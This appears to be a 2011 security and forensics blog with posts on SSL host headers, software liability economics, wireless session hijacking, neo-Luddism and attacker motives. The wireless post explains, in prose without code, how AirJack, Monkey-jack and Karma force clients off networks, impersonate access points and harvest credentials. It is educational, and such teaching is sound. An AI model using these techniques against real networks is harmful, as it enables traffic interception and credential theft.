Saturday, 10 September 2011

Podcast 1

Welcome to the first in a series of security and forensic podcasts. We will be covering some of the main issues in security that have hit the news and also providing tips from time to time.

These podcasts will come at least weekly and for the first episode, click here.

Friday, 9 September 2011

ITE513 Lecture 8 - GREP Section

Welcome to the GREP section of Lecture 8 of ITE 513 (Digital Forensics/Forensic Investigation) from Charles Sturt University (CSU).

In this lecture segment, we cover the universal search tool, grep. Available for Linux by default and Windows with a little mucking about, this is the ultimate command line file search tool.

For more information see:

For all of the YouTube videos I am starting see:

Thursday, 8 September 2011


See InfoSec Island for an article on CyberTerror.

Can SSL use host headers

Actually, virtual host headers can be used for SSL as well. In the HTTP request below, the line, "Host:" is what selects the actual site.

  • GET / HTTP/1.1
  • Host:
  • User-Agent: Windows-RSS-Platform/1.0 (MSIE 7.0; Windows NT 5.1)
  • MSIE /7.0
  • Accept: */*
  • Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  • Keep-Alive: 300
  • Connection: keep-alive
  • Cookie: secret authentication token 12345

When SSL is used, the certificate only states that one IP maps to a single hostname (wildcards for a domain).

Reverse DNS mapping of IP addresses cannot occur for more than one IP address without error, but SSL (and TLS) do not actually mandate reverse PTR records.

The issue and why some sites do not allow it is that multiple certificates can be stored on a single server, so if one virtual server is compromised through a poorly configured web app, many sites can be compromised.

So, it is possible to use SSL on a virtual server with one IP, but it is not always recomended (esp. if the server is shared and you could risk losing control of your certificate keys).

Wednesday, 7 September 2011

Creating a software risk contract to build security into the risk equation

In economic terms, we want to assign liability such that the optimal damage mitigation strategy occurs. The victim will mitigate their damages where no damages for breach apply in respect of the optimal strategy and payoffs. The rule that creates the best incentives for both parties is the doctrine of avoidable consequences (marginal costs liability).

Mitigation of damages is concerned with both the post-breach behaviours of the victim and the actions of the party to minimise the impact of a breach. In a software parlays', this would incur costs to the user of the software in order to adequately secure their systems. This again is a trade-off. Before the breach (through software failures and vulnerabilities that can lead to a violation of a system's security) the user has an obligation to install and maintain the system in a secure state.

The user is likely to have the software products of several vendors installed on a single system. As a consequence of this, the interactions of the software selected and installed by the user span the range of multiple sources and no single software vendor can account for all possible combinations and interactions.
As such, any pre-breach behaviour of the vendor and user of software needs to incorporate the capability of the vendors to not only minimise their own products, but the interactions of other products installed on a system.

There are several options that can be deployed in order to minimise the effects of a breach due to a software problem prior to the discovery of a vulnerability, these include:

  1. The software vendor can implement protective controls (such as firewalls)
  2. The user can install protective controls
  3. The vendor can provide accounting and tracking functions
In addition, in order to minimise the effects of a software vulnerability the following may be done in addition to the previous steps:
  1. The vendor can employ more people to test software for vulnerabilities
  2. The software vendor can add additional controls
Where more time is expended on the provision of software security by the vendor (hiring more testers, more time writing code etc), the cost of the software needs to reflect this additional effort, this is the cost to the consumer increases. This cost can be divided more in the case of a widely deployed Operating System (Such as Microsoft Windows) where the incremental costs can be distributed across more users. Smaller vendors (such as small tailored vendors for the Hotel accounting market) do not have this luxury and the additional controls could result in an substantial increase in the cost of the program.

This is not to say that no liability does or should apply to the software vendor. The vendor in particular faces a reputational cost (discussed later) if they fail to maintain a satisfactory level of controls or do not respond to security vulnerabilities quickly enough or suffer to many problems.

The accumulation of a large number of software vulnerabilities by a vendor has both a reputational cost to the vendor as well as a direct cost to the user (time to install and the associated downtime and lost productivity). As a consequence, the accumulation of software vulnerabilities and the associated difficulty of patching or otherwise mitigating these is a cost to the use that can be investigated prior to a purchase (and is hence a cost that is assigned to new vendors even if they experience an exceptionally low rates of patching/vulnerabilities). As users are rational in their purchasing actions[1], they will incorporate the costs of patching their systems into the purchase price[2].

The probability of a vulnerability occurring in a software product will never approach zero. Gödel, Turning and Distraka[3] demonstrated that it is not possible to prove that a software product is bug free. As a consequence, the testing process by the vendor can be displayed as a hazard model[4]. In this, it is optimal for the vendor to maximise their returns such that the costs of software testing is balanced against their reputation[5].

The cost of finding vulnerabilities can also be expressed as a optimal function through the provisions of a market for vulnerabilities. In this way, the software vendor maximises their testing through a market process. This will result in the vendor extending their own testing to the point where they cannot efficiently discover more bugs. Those bugs that are sold on market are costed and the vendor has to pay to either purchase these from the vulnerability researcher (who has a specialisation in uncovering bugs) or increase their own testing. The vendor will continue to increase the amount of testing that they conduct until the cost of their testing exceeds the cost of purchasing the vulnerability.

This market also acts as an efficient transaction process for the assignment of negligence costs. The user still has to maintain the optimal level of controls that are under their influence (installation, patching frequency etc.) , whilst the vendor is persuaded to pay the optimal level of costs for testing and mitigation.

The vendor should not be liable for avoidable consequences[6]. Where the user has failed to patch, to install and configure controls and to otherwise mitigate the possible damages that they can suffer, the vendor has no responsibility. This costs of mitigation is a part of the total costs of ownership for the software.

In creating risk based contracts, we allow the market to determine the optimal price for risks in software. This allows software hazards to be both modeled and also expensed and the consumer can then make an informed decision based on a trade-off between features and security.

[1] For further information on this topic see behavioural economics and rational behaviour.
[2] It may be demonstrated that sub-optimal behaviour does exist where users limit maintenance (patching) in certain conditions.
[4] This can be demonstrated to fit to a Poisson distributed function
[5] It has been demonstrated that reputation has value to a vendor. This has real world accounting applications in the notion of “good will” in business and capital transactions.
[6] The breaching party is never liable for the damage that could have been mitigated under the legal doctrine of avoidable consequences

Tuesday, 6 September 2011

Wireless Session Hijacking

Wireless session hijacking is the act usurping the connection between the victim’s system and the wireless access point, typically known as MiTM, ‘man-in-the-middle’ (or ‘monkey-in-the-middle’) attacks.

In this post we will look at a few of the most widely used session hijacking tools for wireless. This list is by no means complete, but is based on some of my favourites.

AirJack is a suite of tools that performs wireless session hijacking. It does this by combining the functionality of three tools:
  • WLAN-jack – creates a wireless DoS by sending de-authentication frames to a target system or to a broadcast address, while spoofing the MAC address of the access point with the goal of knocking the wireless client(s) off the network.
  • ESSID-jack – discovers the ESSID by sending de-authentication frames to all clients on the network, then sniffing for association frames when the legitimate clients attempt to re-connect and pulling the ESSID from these frames.
  • Monkey-jack – ‘man-in-the-middle tool that implements the session hijacking.


Monkey-jack is the tool that combines WLAN-jack and ESSID-jack functionality in order to establish the session hijack. It does this in the following manner:
  • Sends wireless de-authentication frames with a spoofed MAC address of the access point to knock legitimate clients off the network.
  • Sniffs the wireless network for association frames that clients will send when re-establishing connectivity with the wireless access point. The ESSID is included in these frames.
  • Using the sniffed ESSID information, Monkey-jack injects a response to the victim and poses as the access point by spoofing the ESSID and MAC address of the legitimate access point on a different channel (at least 5 channels away).
  • The victim associates with the attacker’s system that is running Monkey-jack.
  • The attacker’s system then associates with the legitimate access point, posing as the client using the client’s MAC address.
Once the associations are completed, all traffic from the client and access point flows through the attacker’s system that is running Monkey-jack. The traffic can now be logged or manipulated in any fashion.

Access Point Impersonation

The majority of wireless clients today use a function named the Preferred Network List (PNL). When a wireless client associates with an access point, it will save the ESSID and MAC address of the wireless access point so that it can automatically connect to it in the future without any user intervention. Most wireless clients will also rotate through the PNL periodically and send probes, typically when booting, resuming from hibernation, or after a signal is lost. Some clients will also cycle through the PNL even when associated with an access point.
Some operating systems (Windows Vista, Windows 7) will not send these probes unless beacons are detected for a given SSID. Windows XP does send these probes, but can be patched so that it prevents information leakage like Windows Vista and Windows 7. If a wireless client does send these probes, it is susceptible to access point impersonation.


Karma is a wireless attack tool that sniffs the wireless network looking for PNL probes so that it can impersonate an access point and attempts to associate with the wireless client. Karma does this in the following manner:
  • Karma running on an attacker’s machine sets the wireless card in monitor mode, watching for probe packets.
  • When a probe is detected, Karma changes the wireless card to master mode and sends a response with the ESSID it discovered in the probe request and spoofs the MAC address of the access point it’s impersonating.
  • The client and Karma authenticate and associate (using no encryption).
  • When the client sends a DHCP request, Karma responds with a configuration that sends all traffic to the attacker system running Karma.
  • When the client runs an application that Karma supports, it will respond to the request, allowing the attacker to deliver exploits, harvest account information, etc.
Karma supports the following services which are built in to the tool:
  • DHCP – services client DHCP requests sending ip address, netmask, default gateway (Karma system IP), and DNS server configuration (Karma system IP).
  • DNS – The DNS service resolves all requests for hostnames back to the system running Karma.
  • HTTP – Karma will masquerade as every known web server, and serve up web page(s) of the attacker’s choice, including exploits.
  • FTP – Karma will masquerade as every known FTP server and will harvest account credentials, storing them in a file
  • POP3 – Acting as a POP3 server, Karma will log all usernames and passwords sent by the client over the Post Office Protocol (POP).
  • SMB – Karma will act as Windows files shares or print shares, collecting the client’s challenge/response transactions for later cracking.

Karma Metasploit Integration

A great feature of some Metasploit versions is its built-in integration of Karma. This is commonly referred to as “Karmetasploit” or “Karmasploit”. This built-in version of Karma has all of Karma’s functionality whilst also being able to be served up from within the Metasploit interface. This provides a simple delivery platform for the transfer and deployment of exploits for client browsers and other various client-side applications.

Monday, 5 September 2011


Landes (1998) contends that the Luddite opposition to the “free market and opposition to technological 'progress' were roughly equivalent”. He proposes that the Luddites’ opposed the advancement into modern society with its elevated standards of living in urbanized nations was due to the exercise of technology for personal gain, a situation that mirrors the protesting of the WTO in recent times.

Neo-Luddism has become tantamount to the opposition to progressing technology due with the cultural changes associated with it. The movement inaugurated in Nottingham in 1811 reflects the cultural opposition to technology prevenient in many groups and companies today.

"It ought to be remembered that there is nothing more difficult to take in hand, more perilous to conduct, or more uncertain in its success, than to take the lead in the introduction of a new order of things. Because the innovator has for enemies all those who have done well under the old conditions and lukewarm defenders in those who may do well under the new”, (Machiavelli, Il principe). As such it is also difficult to accept that our changes are any different from those of preceding generations.

  • Landes, David (1998) “The Wealth and Poverty of Nations: Why Some Are So Rich and Some So Poor”, W. W. Norton & Company
  • Machiavelli, Niccolò (1513) “Il principe” (The Prince)

Cui Bono???

In forensic science, the fundamental question to ask is always Cui Bono? or Who Benefits.

There are crimes where people seek infamy as well as for economic gain. In some instances, the person attacking the system may wish to do this to injure another. What is generally true in any case is that somebody benefits.

There are always multiple possible culprits in any investigation, so if you can narrow down the field by starting with those who benefit from the action the most, it is likely that your role will be simplified.
The primary motivations for attacker to break into systems these days are economic. Some of these include:
1. Theft of trade secrets and other Intellectual Property (IP) for economic gain,
2. Attempting to monopolize a product or other offering in a selected market,
3. To acquire competitive advantage in domestic and global markets.
4. Threats of computer technology,
5. Privacy violations,
6. Damaging ones competitor and hence making them less competitive,
7. Leveraging access to pivot or attack other systems,
8. A false flag operation designed to make another look guilty,
9. To use the system as a form of low cost hosting (e.g. in Pharmacy spam image hosting and in illicit porn), and
10. To bring attention to an individual, group or activity.

Basically, the threats are the same as they have always been; only the media has evolved to make it easier to commit the crime.

Determining why can often come down to seeing what. Even paper can be stolen and any of the following can be a source of an information leak:

  • Documents – whether completed or still in draft, and working notes or scrap paper
  • Computer Based Information
  • Photographs, Maps and Charts
  • Internal Correspondence and email
  • Legal and Regulatory Filings
  • Company Intranet access and Publications
  • Formal meeting minutes or transcripts
  • Casual conservations
  • Conversations at trade shows and events.
A competing organization may also be able to make use of and gain an advantage using the following:
  • Marketing and product plans (esp. prior to release)
  • Source code
  • Corporate strategies and plans
  • Marketing, advertising and packaging expenditures
  • Pricing issues, strategies, lists
  • R&D, manufacturing processes and technological operations
  • Target markets and prospect information
  • Plant closures and development
  • Product designs, development and costs
  • Staffing, operations, org charts, wage/salary
  • Partner and contract arrangements (including delivery, pricing and terms)
  • Customer and supplier information
  • Merger and acquisition plans
  • Financials, revenues, P&L, R&D budgets
With the rise of identity fraud and other related offenses, the theft of proprietary company information and private personnel records is also increasing. PII (Personally Identifiable Information) has become a prime target for cyber criminals. Using these records, they can create fake loan applications, purchase goods or even make a complete false identity.

The records sought include:
  • Home addresses
  • Home phone number
  • Names of spouse and children
  • Employee’s salary
  • Social security number
  • Medical records
  • Credit records or credit union account information
  • Performance review
Threat Agents
Knowing who benefits helps you go a long way to discovering who has attacked a site. A variety of threat agents exist for any organisation and the nature of the information, the systems and the activities of the organisation will determine who will benefit from attacking the computer systems of that organisation. The threat agents exist in several general categories.

Any of the following may be a source of threat to an organisation:
  • Accidental antagonists who cause you harm through ignorance or by negligence
  • Incidental antagonists who seek another target but attack because you are there and obtainable
  • Insiders. They may compromise or steal information assets because of motivations from dissatisfaction to economic gain
  • Competitors may attack to gain a benefit or to achieve market dominance
  • Cyber-Vandals, who could attack because you are there or you have a product they do not like
  • Hackers and Crackers in an attempt to obtain information concerning everything that is denied to them or who might be offering their technical proficiency to another with motives of their own
  • Thieves that may attack to further their own financial wellbeing
  • Terrorists, can attack in order to disrupt the connection linking the general public and critical infrastructure
  • The military involved in information warfare actions
We can simplifity this and summarize the main threats to include:
  • Third World Countries,
  • Organized Crime,
  • Hackers,
  • Hactivists,
  • Terrorist Organizations,
  • Internal Competitors (within a nation),
  • Foreign Competitors, and
  • Foreign Intelligence Agencies
Hostile Nations such as China, North Korea, Cuba and Iran are only one source of remote threat. Friendly Nations have also been known (and caught) in these activities in the past.

What this tells us…
It all comes down to “know thy enemy”. In both responding to an incident as well as in preventing on, it is essential to know who would benefit from attacking your organisations systems.
As Sun Tzu said:
Know your enemy and know yourself; in a hundred battles, you will never be defeated. When you are ignorant of the enemy but know yourself, your chances of winning or losing are equal. If ignorant both of your enemy and of yourself, you are sure to be defeated in every battle”.
The first party to understanding an attacker is to understand who benefits.